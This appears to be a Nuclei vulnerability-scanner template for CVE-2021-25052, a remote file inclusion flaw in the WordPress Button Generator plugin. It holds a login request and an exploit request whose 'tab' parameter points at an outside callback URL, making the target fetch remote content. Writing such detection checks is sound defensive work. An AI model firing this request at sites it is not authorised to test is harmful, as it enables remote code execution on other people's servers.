id: CVE-2021-25052 info: name: WordPress Button Generator <2.3.3 - Remote File Inclusion author: cckuailong severity: high description: WordPress Button Generator before 2.3.3 within the wow-company admin menu page allows arbitrary file inclusion with PHP extensions (as well as with data:// or http:// protocols), thus leading to cross-site request forgery and remote code execution. reference: - https://wpscan.com/vulnerability/a01844a0-0c43-4d96-b738-57fe5bfbd67a - https://nvd.nist.gov/vuln/detail/CVE-2021-25052 - https://plugins.trac.wordpress.org/changeset/2641639/button-generation classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2021-25052 cwe-id: CWE-352 tags: cve,cve2021,rfi,wp,wordpress,wp-plugin,authenticated requests: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/admin.php?page=wow-company&tab=http://{{interactsh-url}}/ HTTP/1.1 Host: {{Hostname}} cookie-reuse: true matchers-condition: and matchers: - type: word part: interactsh_protocol name: http words: - "http" - type: status status: - 200 # Enhanced by mp on 2022/06/27